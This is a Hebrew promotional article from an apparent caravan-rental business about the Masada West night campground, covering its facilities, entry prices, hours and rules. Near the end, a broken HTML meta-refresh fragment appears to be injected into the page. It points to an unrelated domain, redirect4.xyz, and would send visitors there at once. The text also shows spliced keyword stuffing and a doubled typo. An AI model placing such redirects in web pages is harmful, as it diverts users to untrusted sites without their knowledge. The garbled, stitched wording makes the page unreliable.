מצדה מערב

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

את הגן הלאומי מצדה אנחנו לא צריכים להציג בפניכם. את הסיפור המיתי הכללי על מעשה הגבורה במצדה יכול לספר כל ישראלי גםמצדה מערב מתוך שינה, כשהאתר עצמו כולל מרכז מבקרים ומוזיאון שמאפשר ללמוד עוד יותר על המקום.

אם מוסיפים לכך את היופי הבלתי נתפס של מצדה, הנופים המרהיבים שמקיפים אותה והעובדה שהזריחות בה הן עוצרות נשימה, מבינים מדוע שהות של מספר ימים בשטח מצדה מומלץ לכל אחד ואחת מכם, ובכל הרכב מטיילים.

חניון הלילה של מצדה מערב, שנפתח על ידי רשות הטבע והגנים, נכנס לתמונה בלא מעט מצבים – כולל כאשר מעוניינים לטייל באזור באמצעות קראוון שכור.

על חניון הלילה במצדה מערב

חניון הלילה מצדה מערב הוא בעל קיבולת של כ-500 איש, והוא פתוח בכל ימות השנה למעט יום כיפור. החניון מאפשר לינת שטח באוהלים פרטיים, לינה על מזרונים בחמישה אוהלים קבועים, לינה בחדרי צוות (עד חמישה אנשים בחדר) וכמובן שגם חניה של קראוונים, שנהנים מחיבור לחשמל ומנקודה מרכזית של מילוי מים.

התשתיות של החניון ראויות בהחלט. הוא מציע עבור המתארחים בו תאורה מלאה, ברזיות מים, תאי שירותים (שבעה תאים לגברים ושבעה לנשים), תאי מקלחת (שישה לגברים ושישה לנשים), ברזיות מים לשתייה, ספסלים ושולחנות, נקודות חשמל, תאי הטענת טלפונים סלולריים, פינות קומזיץ (עם עצים למדורה) ועוד. מי שמעוניין להכין ארוחות באופן עצמאי יוכל להיעזר בשני מטבחי השדה, בהם כירות גז, מקררים גדולים וכיורים לשטיפת כלים.

אין בחניון הלילה של מצדה מערב מרכז שירות למטייל, כך שחשוב שתצטיידו מראש בכל מה שאתם זקוקים לו – למעט מזרנים או שקי שינה אותם ניתן לשכור במקום תמורת 10 ש”ח ללילה.

תנאי הכניסה והשהות בחניון

כדי להיכנס עם קראוון פרטי לחניון מצדה מערב נדרש לשלם כמובן, אם כי הסכום הוא בהחלט סביר. מבוגרים משלמים 53 ש”ח לכניסה בעוד ילדים 42 ש”ח. מי שמחזיק במנוי של רשות הטבע והגנים מקבל הנחה, כשהמחיר במקרה הזה הוא 38 ש”ח למבוגר או 32 ש”ח לילד. מחירים אלה כוללים ביקור במצדה, אבל רק בדרך הרגלית (דרך שביל הסוללה) ולא כולל הרכבל. על חיבור לחשמל תצטרכו להוסיף 30 ש”ח ללילה לקרוואן.

אל חניון הלילה ניתן להיכנס החל מהשעה 16:00, ביום ההגעה אליו, כשמדי יום החניון נסגר בשעה 22:30. היציאה מחניון הלילה אפשרית עד השעה 11:00 ביום העזיבה או השעה 10:00, אם עוזבים את החניון ביום חג. חל איסור להפעיל בשטח החניון גרנטורים גנרטורים או אמצעי הגברה, וגם לא לשמוע מוזיקה בקולי קולות. איסור נוסף הוא להיכנס לשטח החניון עם כלבים.

עוד משהו אחד לפני סיום: שימו לב שלחניון מצדה מערב ניתן להגיע מתוך ערד בלבד, ולא דרך ים המלח. קחו את זה בחשבון בתכנון הטיול שלכם.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר